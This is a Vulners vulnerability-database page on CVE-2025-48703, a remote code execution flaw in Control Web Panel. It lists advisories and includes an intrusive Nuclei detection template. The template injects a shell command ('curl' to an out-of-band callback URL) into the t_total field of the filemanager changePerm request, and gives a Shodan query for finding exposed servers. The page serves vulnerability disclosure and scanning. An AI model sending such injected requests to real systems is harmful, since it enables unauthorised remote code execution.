| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Exploit for CVE-2025-48703 | 25 Jun 202520:52 | – | githubexploit | |
| Exploit for CVE-2025-48703 | 26 Jun 202514:19 | – | githubexploit | |
| The vulnerability of the application for managing CentOS Web Panel lies in its failure to eliminate certain special elements, allowing a perpetrator to execute arbitrary code. | 2 Jul 202500:00 | – | bdu_fstec | |
| CVE-2025-48703 | 24 Jun 202509:39 | – | circl | |
| CWP Control Web Panel OS Command Injection Vulnerability | 4 Nov 202500:00 | – | cisa_kev | |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 4 Nov 202512:00 | – | cisa | |
| Control Web Panel 操作系统命令注入漏洞 | 19 Sep 202500:00 | – | cnnvd | |
| CVE-2025-48703 | 19 Sep 202500:00 | – | cve | |
| CVE-2025-48703 | 19 Sep 202500:00 | – | cvelist | |
| EUVD-2025-30324 | 3 Oct 202520:07 | – | euvd |
| Source | Link |
|---|---|
| fenrisk | www.fenrisk.com/rce-centos-webpanel |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2025-48703 |
id: CVE-2025-48703
info:
name: CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
CWP (Control Web Panel) < 0.9.8.1205 contains a remote code execution caused by shell metacharacters in the t_total parameter in filemanager changePerm request, letting unauthenticated attackers execute code remotely, exploit requires knowledge of a valid non-root username.
impact: |
Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full system compromise.
remediation: |
Update to version 0.9.8.1205 or later.
reference:
- https://fenrisk.com/rce-centos-webpanel
- https://nvd.nist.gov/vuln/detail/CVE-2025-48703
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.0
cve-id: CVE-2025-48703
epss-score: 0.99589
epss-percentile: 0.99942
cwe-id: CWE-78
metadata:
verified: false
shodan-query: 'Server: cwpsrv'
tags: cve,cve2025,cwp,cwpsrv,rce,intrusive,file-upload,oast,oob,vkev,kev
flow: http(1) && http(2)
http:
- raw:
- |
GET /login/index.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body, 'Control WebPanel', 'cwp')"
condition: and
internal: true
- raw:
- |
POST /{{username}}/index.php?module=filemanager&acc=changePerm HTTP/1.1
Host: {{hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrTrcHpS9ovyhBLtb
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="fileName"
.bashrc
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="currentPath"
/home/{{username}}
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="recursive"
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="t_total"
curl {{interactsh-url}}
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 4a0a00473045022100d5c81277d8d113f2f8d7765f4c9622bde4e6665eefbc3b6b935fb92b5060751b0220500d214971290343401d66d8e87ea32402bdcd1c1406f2da5b71d855a380a218:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation